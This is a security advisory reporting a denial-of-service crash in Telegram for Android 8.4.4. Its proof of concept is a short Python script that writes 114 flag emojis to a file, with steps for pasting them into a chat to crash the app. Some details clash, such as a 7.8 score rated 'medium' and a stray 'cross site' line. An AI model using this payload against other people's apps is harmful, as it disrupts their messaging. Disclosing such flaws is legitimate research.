Telegram Android 8.4.4 Denial Of Service

`Document Title:  
===============  
Telegram Android v8.4.4 - Denial of Service (PoC)  
  
  
References (Source):  
====================  
https://twitter.com/h4shur  
  
  
Release Date:  
=============  
2022-01-30  
  
  
Common Vulnerability Scoring System:  
====================================  
7.8  
  
  
Product & Service Introduction:  
===============================  
Telegram is a freeware, cross-platform, cloud-based instant messaging (IM)  
service. The service also provides end-to-end encrypted video calling,  
VoIP, file sharing and several other features. It was launched for iOS on  
14 August 2013 and Android in October 2013. The servers of Telegram are  
distributed worldwide to decrease frequent data load with five data centers  
in different regions, while the operational center is based in Dubai in the  
United Arab Emirates. Various client apps are available for desktop and  
mobile platforms including official apps for Android, iOS, Windows, macOS  
and Linux (although registration requires an iOS or Android device and a  
working phone number). There are also two official Telegram web twin apps –  
WebK and WebZ – and numerous unofficial clients that make use of Telegram's  
protocol. All of Telegram's official components are open source, with the  
exception of the server which is closed-sourced and proprietary.  
  
Telegram provides end-to-end encrypted voice and video calls and optional  
end-to-end encrypted "secret" chats. Cloud chats and groups are encrypted  
between the app and the server, so that ISPs and other third-parties on the  
network can't access data, but the Telegram server can. Users can send text  
and voice messages, make voice and video calls, and share an unlimited  
number of images, documents (2 GB per file), user locations, animated  
stickers, contacts, and audio files. In January 2021, Telegram surpassed  
500 million monthly active users. It was the most downloaded app worldwide  
in January 2021 with 1 billion downloads globally as of late August 2021.  
  
  
Abstract Advisory Information:  
==============================  
An independent vulnerability researcher discovered Android application  
vulnerabilities in the Telegram application.  
  
  
Affected Product(s):  
====================  
Vendor: telegram.org / telegram.me / t.me  
Product: Android Telegram application (Android-Application)  
https://telegram.org/android  
  
  
Vulnerability Disclosure Timeline:  
==================================  
2022-01-30: Researcher Notification & Coordination (Security Researcher)  
2022-01-30: Public Disclosure  
  
  
Discovery Status:  
=================  
Published  
  
  
Exploitation Technique:  
=======================  
local  
  
  
Severity Level:  
===============  
medium  
  
  
Disclosure Type:  
================  
Full Disclosure  
  
  
Technical specifications and description:  
================================  
1.1  
In version 8.4.4 of Android Telegram application, a denial of service  
vulnerability was discovered by H4shur. Vulnerability is in the emojis of  
these messenger.  
  
1.2  
If you send a number of flag emojis with any text on the chat page,  
clicking on that message will stop the program altogether and avoid  
providing services.  
  
  
Proof of Concept (PoC):  
=======================  
1.1  
A Denial of Service (DOS) attack is a type of cyberattack in which a  
malicious person performs an attack with the aim of removing the resources  
of a system from the reach of its users.  
It is natural that if this attack is successful, the result will be a  
slowdown or disabling of the equipment and resources available to the  
victim.  
For security demonstration or to reproduce the persistent cross site web  
vulnerability follow the provided information and steps below to continue.  
  
  
PoC: Exploitation  
1.1  
Run the python script, it will create a new file "outputbufferh4shur.txt".  
1.2  
Run Telegram Android and go to "Saved Messages" or any Chat page.  
1.3  
Copy the content of the file "outputbufferh4shur.txt".  
1.4  
Paste the content of outputbufferh4shur.txt into the "Write a message..."  
and then type any text to this message.  
1.5  
Ops...  
Telegram Crashed <3  
  
  
script:  
bufferh4shur = "🇮🇷" * 114  
try:  
f=open("outputbufferh4shur.txt","w")  
print("[!] Creating %s bytes DOS payload...." %len(bufferh4shur))  
f.write(bufferh4shur)  
f.close()  
print("[!] File Created!")  
except:  
print("File cannot be created!")  
  
  
  
Security Risk:  
==============  
1.1  
A Denial of Service (DOS) attack is a type of cyberattack in which a  
malicious person performs an attack with the aim of removing the resources  
of a system from the reach of its users.  
It is natural that if this attack is successful, the result will be a  
slowdown or disabling of the equipment and resources available to the  
victim.  
  
  
Credits & Authors:  
==================  
h4shur  
Twitter: @h4shur ; Telegram: @h4shur ; Instagram: @h4shur  
[email protected]  
`